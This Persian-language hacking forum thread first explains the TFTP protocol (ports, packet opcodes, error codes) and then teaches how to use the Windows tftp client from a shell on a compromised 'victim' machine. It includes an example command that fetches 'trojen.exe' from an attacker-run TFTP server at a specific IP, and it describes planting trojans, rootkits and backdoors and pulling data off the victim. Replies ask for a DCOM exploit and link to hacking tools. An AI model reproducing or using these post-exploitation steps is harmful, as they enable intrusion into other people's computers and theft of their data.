TFTP خلاصه Trivial File Transfer Protocol است که بر روی پورت 69 کار می کند. تفاوت آن با FTP در اینست که FTP از TCP استفده می کند ولی TFTP ازUDP استفاده می کند که البته FTP دارای ثبات و اطمینان قابل قبولی هست در صورتی که TFTP سرعت را برای ما به ارمغان می آورد. نکته جالب توجه در این است که TFTP احتیاجی به پسورد ندارد. جابجایی در اینجا بدین شکل است که client از server در خواست (نوشتن)write یا (خواندن)read می کند که معمولا همان درخواست Read (PRQ) مورد قبول واقع می شود و با قبول شدن در خواست از سوی سرور ارتباط میان آن دو بر قرار می گردد و جایجایی اطلاعات آغاز می گردد. در ترانسفر packet/block جابجایی تا 512بایت آنجام شده و سپس سرور منتظر جواب دریافت(ACK) از سوی کلاینت میشود و بعد از دریافت جواب دوباره 512 بایت یعدی را می فرستد و برای هر 512بایت این کار تکرار میشود . هر یک از بلاک های دریافتی به انتهای بلاک قبلی متصل میشود اگر در این حین یکی از packet گم گردد هر دوی کلاینت و سرور یک time-out ایجاد نموده و دوباره همان packet گم شده را ارسال می کند. همیشه فرستنده باید آخرین بلاک را در حافظه نگهداری نمایید تا زمانی که پیام ACK را دریافت نماید البته اگر آخرین بلاک از فایل باشد دیگر احتیاجی به صبر کردن و نگهداری بر روی حافظه نیست. 0 mode 0 Filename 01 پیام های TFTP خواندن پیام در خواست 01 نشان دهنده 2 بایت از دستور OPcode network byte که طرف مقابل می گویید این یک READمی باشد. Filename یک رشته null terminated ascii می باشد که نام فایل را به همراه دارد. Mode یک رشته null terminated ascii می باشد که نوع جابجایی را در خود دارد. نوشتن پیام در خواست 0 mode 0 Filename 02 توضیحان این بخش هم مثل بالا می باشد با این تفاوت که 01 برای WRITE می باشد. TFTP Data Packet / Message Data 0 to 512bytes Block # 03 03 2 بایت از دستور OPcode network byte که می گوید در طرف مقبل داده ها قرار دارد. Block # 2 بایت از دستور bytes block number network byte Data 0 to 512bytes همه پکت دیتا ها 512 یایت در خود دارند غیر از آخری جواب Block # 04 04 2 بایت از دستور OPcode network byte که معلوم می کند برای طرف دیگر که ACK می باشد. Block # 2 بایت از دستور block number network byte انواع Error ها 0 errstring errcode 05 05 2 بایت از دستور OPcode network byteکه به طرف مقابل می گویید این یک Error می باشد. Errcode 2 بایت از دستور error code network byte می باشد. Errstring یک رشته null terminated ascii error و error code ها به ترتیب زیرند: 0 - Not defined. 1 - File not found. 2 - Access violation. 3 - Disk full. 4 - Illegal TFTP operation. 5 - Unknown port. 6 - File already exists. 7 - No such user و طریقه های TFTP ترانسفر دو دسته می باشند: 1. netascii که برای انتقالtext فایل ها استفاده شده که البته دو طرف باید برای دریافت و فرستادن به این روش آماده باشند 2. octet که برای انتقال فایل هایbinary مورد استفاده قرار می گیرد.

منبع: persianhacker.net

به نام خدا
آموزش استفاده از Tftp .
نويسنده يونس فرهادنيا.

Tftp ) (trivial file transfer Protocolپروتكلي ساده و جمع وجور براي انتقال اطلاعات از طريق شبكه است به وسيله Noel Chiappa طراحي شده است و در RFC 1350 در مورد اين پروتكل بحث شده .
TFTP تنها قابليت خواندن و نوشتن اطلاعات روي سرور راه دور را دارد. براي اين منظور يعني انتقال اطلاعات روي سرور بايد از سرور TFTP كه TFTPd نام دارد استفاده كرد يعني ابتدا روي كامپيوتري كه مي خواهيم به عنوان سرور عمل كند TFTPd را RUN كرده بعد به وسيله TFTP عمليات انتقال و دريافت اطلاعات را انجام دهيم مي توانيد از اين آدرس يك TFTPd دانلود كنيد [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
خوب حالا شما بايد نحوه كار اين سرور و كلاينت يعني tftp و tftpd را بياموزيد.
ما براي مثال وقتي كه يك كامپيوتر را به وسيلة اكسپلويتي هك مي كنيم يك شل از آن كامپيوتر مي گيريم خوب در اين مرحله قطعا ما تمايل داريم كه يك سري نرم افزار روي سيستم قرباني دانلود كنيم و سطح دسترسي خود را به سيستم قرباني بالا ببريم يا يك سري اطلاعات از كامپيوتر قرباني بر روي سيستم خود دانلود كنيم براي اين منظور بهترين و ساده ترين ابزار همين tftp است كه همراه سيستم عامل نيز وجود دارد و در آدرس %systemroot%/system32/ قرار دارد و شما وقتي كه يك شل گرفته ايد به راحتي مي توانيد ان را اجرا كنيد ولي بايد در ابتدا يك tftpd روي سيستم خود اجرا كرده تا سيستم شما سروري براي اين نرم افزار باشد براي اين منظور اگر همين tftpd كه در اين مقاله لينك دانلودش قرار داده شده است استفاده كنيد بايد مراحل زير را انجام دهيد:
ابتدا Tftpd32.exe را اجرا كنيد(شكل زير):
خوب در اين حال يك ايكون هم در قسمت systry سيستم شما ظاهر خواهد شد و اگر firewall هم داشته باشيد از شما سوال مي كند كه اجازه مي دهيد كه اين نرم افزار روي يك پرت listing شود شما درخواست را پاسخ مثبت دهيد و اين نرم افزار روي پرت 69 به حالت گوش دهنده آماده به كار مي شود ولي بايد شما يك تنظيم ديگر نيز انجام دهيد تا همه چيز آماده شود شما در اين مرحله بايد base directory را نيز براي اين نرم افزار مشخص كنيد.
base directory چيست:
base directory دايركتوري است كه اين نرم افزار به عنوان دايركتوري براي عمليات ارسال و دريافت از ان استفاده مي كند يعني اگر چيزي را دانلود كنيد در اين دايركتوري قرار مي گيرد و اگر چيزي در اين پوشه باشد با ذكر نام آن مي توانيد آن را upload كنيد براي مشخص كردن اين پوشه كه به طور پيش فرض mydocument شما مي باشد بايد دكمه settings را كليك كنيد و در پنجره باز شده(شكل زير

در قسمت بالي پنجره آدرس بيس دايركتوري خود را وارد كنيد و روي دكمه Ok كليك كرده و ديگر همه چيز مهياست براي كار با قسمت كلاينت يعني خود TFTP .
Tftp يك نرم افزار تحت كنسول است يعني حالت متني دارد و در شل اجرا مي شود و شما مي توانيد به راحتي از اين نرم افزار كه همراه كامپيوتر قرباني است براي مقاصد خود استفاده كنيد صورت كلي اين نرم افزار بدين صورت است:
Tftp –I HostName [Get/Put] Source Destination
كه سويچ I ترتيب انقال فايل به صورت باينري رو مي ده (البته من مي گم انتقال فايل دقيقا منظورم كلمه انتقال نيست بلكه فقط يك تصوير از فايل ارسال مي شه مثل دستگاه فكس نه اينكه كل فايل از سرور move بشه روي اون كامپيوتر و ديگر اثري از فايل روي سرور نباشه) اگر هم نوشته نشه فكر مي كنم كه فايل به صورت اكتال انتقال داده مي شه در اين مورد دقيقا مطمئن نيستم.
HostName هم آدرس آي پي كامپيوتر سرور است يعني همون كامپيوتري كه TFTPD روش Run شده get براي هنگامي است كه شما مي خواهيد يك فايل رو بفرستيد براي كامپيوتر قرباني و put هنگامي استفاده ميشه كه بخواهيد يك فايل رو روي كامپيوتر خود دانلود كنيد درست عكس زماني است كه شما روي كامپيوتر خود عمل دانلود و آپلود رو انجام مي دهيد. Source آدرس فايل مورد نظر شما براي عمليات آرسال يا دريافت است Destination هم آدرس مقصد است.
مثال:
Tftp –I 213.176.108.156 get trojen.exe c:\trojen.exe
كه اين دستور باعث مي شه كه فايلي به اسم trojen.exe از basedirectory كامپيوتري با ip 213.176.108.156 به درايو c: كامپيوتري كه دستور بالا در اون اجرا شده كپي بشه.
به همين سادگي شما مي تونيد trojen , rootkit , backdoor و هر چيز دلخواه ديگري روي كامپيوتر مورد نظر خود دانلود و يا هر اطلاعاتي كه نياز داريد از آن آپلود كنيد.

hatef_4541 جان

اين لينكي كه TFTP دادي خرابه لطفا لينك سالمي براي دانلود بگذار
آيا با استفاده از اين مي توان فايل هاي چند مگي را هم از سيستم قرباني گرفت
سوال دوم آيا لينك سالم و بدون باگي از اكسپوليت داري (GUIRPC Dcom Exploit ) چون در سيستم من قسمت FTPش خطاي RUN TIME ميده
با تشكر

Tftp رو سرچ كن گير مياري !

آره ميتوني فايل بگيري !

اكسپلويت رو ندارم :)

همون برنامه:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

جالب بود
اينم يه سايت براي دانلود برنامه هاي هك براي اونايي كه عاشق حال گيرين
The One Programs ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])